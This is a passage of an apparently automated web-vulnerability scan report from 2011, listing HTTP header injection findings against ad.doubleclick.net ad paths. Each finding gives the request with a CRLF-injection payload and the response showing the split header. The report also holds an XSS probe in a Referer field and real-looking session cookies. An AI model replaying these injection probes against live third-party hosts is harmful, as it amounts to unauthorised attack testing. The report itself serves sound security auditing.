Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING%2527%2527; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:25:35 GMT
Connection: close
Set-Cookie: JSESSIONID=98349B4139B3A06BCDE2DC9B8F0AAD32.septuv5web; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:25:33 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:25:33 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:25:35 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:25:35 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303496733626~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:25:35 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 18:25:35 GMT
Content-Length: 212900


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

2. HTTP header injection
There are 35 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/ad/x1.aud/salesforce/customcloud/lp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/x1.aud/salesforce/customcloud/lp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 783e8%0d%0ac06670d51f2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /783e8%0d%0ac06670d51f2/x1.aud/salesforce/customcloud/lp;sz=1x1;ord=1303485894655? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/783e8
c06670d51f2
/x1.aud/salesforce/customcloud/lp;sz=1x1;ord=1303485894655:
Date: Fri, 22 Apr 2011 15:27:18 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3493.intergi.com/B5426713.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a868%0d%0ad0c23c48779 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a868%0d%0ad0c23c48779/N3493.intergi.com/B5426713.10;sz=300x250;pc=[TPAS_ID];click=http%3A//ads.intergi.com/adlink%2F5205%2F1785959%2F0%2F170%2FAdId%3D1631923%3BBnId%3D8%3Bitime%3D486158650%3Blink%3D;ord=486158650? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7a868
d0c23c48779
/N3493.intergi.com/B5426713.10;sz=300x250;pc=[TPAS_ID];click=http: //ads.intergi.com/adlink/5205/1785959/0/170/AdId=1631923;BnId=8;itime=486158650;link=;ord=486158650
Date: Fri, 22 Apr 2011 15:43:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.9 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3493.intergi.com/B5426713.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 60418%0d%0a34c9f29abd4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /60418%0d%0a34c9f29abd4/N3493.intergi.com/B5426713.9;sz=728x90;pc=[TPAS_ID];click=http%3A//ads.intergi.com/adlink%2F5205%2F1785960%2F0%2F225%2FAdId%3D1631923%3BBnId%3D7%3Bitime%3D486157331%3Blink%3D;ord=486157331? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/60418
34c9f29abd4
/N3493.intergi.com/B5426713.9;sz=728x90;pc=[TPAS_ID];click=http: //ads.intergi.com/adlink/5205/1785960/0/225/AdId=1631923;BnId=7;itime=486157331;link=;ord=486157331
Date: Fri, 22 Apr 2011 15:43:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adj/wn.loc.kwtv/business [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/business

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24a69%0d%0a95608d91e7f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24a69%0d%0a95608d91e7f/wn.loc.kwtv/business;sz=850x30;wnsz=85;tile=1;wncc=Business;wnpt=C;wnpc=category;wncp=KWTV;wncid=148006;wnad85=kwtv;apptype=platform;env=production;ord=40232894? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/24a69
95608d91e7f
/wn.loc.kwtv/business;sz=850x30;wnsz=85;tile=1;wncc=Business;wnpt=C;wnpc=category;wncp=KWTV;wncid=148006;wnad85=kwtv;apptype=platform;env=production;ord=40232894:
Date: Fri, 22 Apr 2011 15:49:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adj/wn.loc.kwtv/education [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/education

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 128d5%0d%0a371e27bda97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /128d5%0d%0a371e27bda97/wn.loc.kwtv/education;sz=850x30;wnsz=85;tile=1;wncc=Education;wnpt=C;wnpc=category;wncp=KWTV;wncid=118249;wnad85=kwtv;apptype=platform;env=production;ord=2486062? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/128d5
371e27bda97
/wn.loc.kwtv/education;sz=850x30;wnsz=85;tile=1;wncc=Education;wnpt=C;wnpc=category;wncp=KWTV;wncid=118249;wnad85=kwtv;apptype=platform;env=production;ord=2486062:
Date: Fri, 22 Apr 2011 15:50:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adj/wn.loc.kwtv/foodrecipe [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/foodrecipe

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 85080%0d%0a1c362817312 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /85080%0d%0a1c362817312/wn.loc.kwtv/foodrecipe;sz=850x30;wnsz=85;tile=1;wncc=Food%20Recipe;wnpt=C;wnpc=category;wncp=KWTV;wncid=116604;wnad85=kwtv;apptype=platform;env=production;ord=44488092? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/85080
1c362817312
/wn.loc.kwtv/foodrecipe;sz=850x30;wnsz=85;tile=1;wncc=Food Recipe;wnpt=C;wnpc=category;wncp=KWTV;wncid=116604;wnad85=kwtv;apptype=platform;env=production;ord=44488092:
Date: Fri, 22 Apr 2011 16:02:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adj/wn.loc.kwtv/health [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/health

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4ab25%0d%0adf95d629563 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4ab25%0d%0adf95d629563/wn.loc.kwtv/health;sz=850x30;wnsz=85;tile=1;wncc=Health;wnpt=C;wnpc=category;wncp=KWTV;wncid=118786;wnad85=kwtv;apptype=platform;env=production;ord=69038566? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4ab25
df95d629563
/wn.loc.kwtv/health;sz=850x30;wnsz=85;tile=1;wncc=Health;wnpt=C;wnpc=category;wncp=KWTV;wncid=118786;wnad85=kwtv;apptype=platform;env=production;ord=69038566:
Date: Fri, 22 Apr 2011 15:49:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/wn.loc.kwtv/homepage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/homepage

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 444c6%0d%0ae6a8292f14b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /444c6%0d%0ae6a8292f14b/wn.loc.kwtv/homepage;sz=850x30;wnsz=85;tile=1;wncc=Homepage;wnpt=C;wnpc=home;wncp=KWTV;wncid=112029;wnad85=kwtv;apptype=platform;env=production;ord=44676079? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/444c6
e6a8292f14b
/wn.loc.kwtv/homepage;sz=850x30;wnsz=85;tile=1;wncc=Homepage;wnpt=C;wnpc=home;wncp=KWTV;wncid=112029;wnad85=kwtv;apptype=platform;env=production;ord=44676079:
Date: Fri, 22 Apr 2011 15:29:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adj/wn.loc.kwtv/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 79784%0d%0aad9ab883b2f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /79784%0d%0aad9ab883b2f/wn.loc.kwtv/news;sz=850x30;wnsz=85;tile=1;wncc=News;wnpt=C;wnpc=category;wncp=KWTV;wncid=112032;wnad85=kwtv;apptype=platform;env=production;ord=5667961? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/79784
ad9ab883b2f
/wn.loc.kwtv/news;sz=850x30;wnsz=85;tile=1;wncc=News;wnpt=C;wnpc=category;wncp=KWTV;wncid=112032;wnad85=kwtv;apptype=platform;env=production;ord=5667961:
Date: Fri, 22 Apr 2011 15:31:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/wn.loc.kwtv/radio01 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/radio01

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c7a0%0d%0ac1c87f28023 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c7a0%0d%0ac1c87f28023/wn.loc.kwtv/radio01;sz=850x30;wnsz=85;tile=1;wncc=Radio%2001;wnpt=C;wnpc=category;wncp=KWTV;wncid=167390;wnad85=kwtv;apptype=platform;env=production;ord=49511500? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c7a0
c1c87f28023
/wn.loc.kwtv/radio01;sz=850x30;wnsz=85;tile=1;wncc=Radio 01;wnpt=C;wnpc=category;wncp=KWTV;wncid=167390;wnad85=kwtv;apptype=platform;env=production;ord=49511500:
Date: Fri, 22 Apr 2011 15:30:46 GMT
Server: GFE/2.0

<h1>Error 301 Moved Permanently</h1>

2.11. http://ad.doubleclick.net/adj/wn.loc.kwtv/radio07 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/radio07

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 70979%0d%0a884ebdddc36 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /70979%0d%0a884ebdddc36/wn.loc.kwtv/radio07;sz=850x30;wnsz=85;tile=1;wncc=Radio%2007;wnpt=C;wnpc=category;wncp=KWTV;wncid=192772;wnad85=kwtv;apptype=platform;env=production;ord=66912645? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/70979
884ebdddc36
/wn.loc.kwtv/radio07;sz=850x30;wnsz=85;tile=1;wncc=Radio 07;wnpt=C;wnpc=category;wncp=KWTV;wncid=192772;wnad85=kwtv;apptype=platform;env=production;ord=66912645:
Date: Fri, 22 Apr 2011 15:30:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/wn.loc.kwtv/sales-environmental [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/sales-environmental

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 38d1b%0d%0a18fb41cf4bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /38d1b%0d%0a18fb41cf4bb/wn.loc.kwtv/sales-environmental;sz=850x30;wnsz=85;tile=1;wncc=Sales%20-%20Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;apptype=platform;env=production;ord=24937444? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/38d1b
18fb41cf4bb
/wn.loc.kwtv/sales-environmental;sz=850x30;wnsz=85;tile=1;wncc=Sales - Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;apptype=platform;env=production;ord=24937444:
Date: Fri, 22 Apr 2011 15:58:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/wn.loc.kwtv/sales-worldnow22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/sales-worldnow22

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39061%0d%0a54db89200bd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39061%0d%0a54db89200bd/wn.loc.kwtv/sales-worldnow22;sz=850x30;wnsz=85;tile=1;wncc=Sales%20-%20WorldNow%2022;wnpt=C;wnpc=category;wncp=KWTV;wncid=174696;wnad85=kwtv;apptype=platform;env=production;ord=43728747? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/39061
54db89200bd
/wn.loc.kwtv/sales-worldnow22;sz=850x30;wnsz=85;tile=1;wncc=Sales - WorldNow 22;wnpt=C;wnpc=category;wncp=KWTV;wncid=174696;wnad85=kwtv;apptype=platform;env=production;ord=43728747:
Date: Fri, 22 Apr 2011 15:31:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/wn.loc.kwtv/station15 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/station15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 42451%0d%0a9e7b66d82f4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /42451%0d%0a9e7b66d82f4/wn.loc.kwtv/station15;sz=850x30;wnsz=85;tile=1;wncc=Station%2015;wnpt=L;wnpc=linksplus;wncp=KWTV;wncid=288387;wnad85=kwtv;apptype=platform;env=production;ord=95186721? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/42451
9e7b66d82f4
/wn.loc.kwtv/station15;sz=850x30;wnsz=85;tile=1;wncc=Station 15;wnpt=L;wnpc=linksplus;wncp=KWTV;wncid=288387;wnad85=kwtv;apptype=platform;env=production;ord=95186721:
Date: Fri, 22 Apr 2011 16:00:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ad.doubleclick.net/adj/wn.loc.kwtv/station5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/station5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 65653%0d%0af322941222e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /65653%0d%0af322941222e/wn.loc.kwtv/station5;sz=850x30;wnsz=85;tile=1;wncc=Station%205;wnpt=C;wnpc=category;wncp=KWTV;wncid=118270;wnad85=kwtv;apptype=platform;env=production;ord=80149608? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/65653
f322941222e
/wn.loc.kwtv/station5;sz=850x30;wnsz=85;tile=1;wncc=Station 5;wnpt=C;wnpc=category;wncp=KWTV;wncid=118270;wnad85=kwtv;apptype=platform;env=production;ord=80149608:
Date: Fri, 22 Apr 2011 15:33:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.16. http://ad.doubleclick.net/adj/wn.loc.kwtv/station9 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/station9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 67945%0d%0ae9c1fd5ec9b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /67945%0d%0ae9c1fd5ec9b/wn.loc.kwtv/station9;sz=850x30;wnsz=85;tile=1;wncc=Station%209;wnpt=S;wnpc=story;wncp=KWTV;wncid=7520733;wnad85=kwtv;apptype=platform;env=production;ord=5657574? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=c67717d3600004f||t=1303486122|et=730|cs=dj_eps5o

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/67945
e9c1fd5ec9b
/wn.loc.kwtv/station9;sz=850x30;wnsz=85;tile=1;wncc=Station 9;wnpt=S;wnpc=story;wncp=KWTV;wncid=7520733;wnad85=kwtv;apptype=platform;env=production;ord=5657574:
Date: Fri, 22 Apr 2011 15:30:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.17. http://ad.doubleclick.net/adj/wn.nat.kwtv/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/news

Issue detail

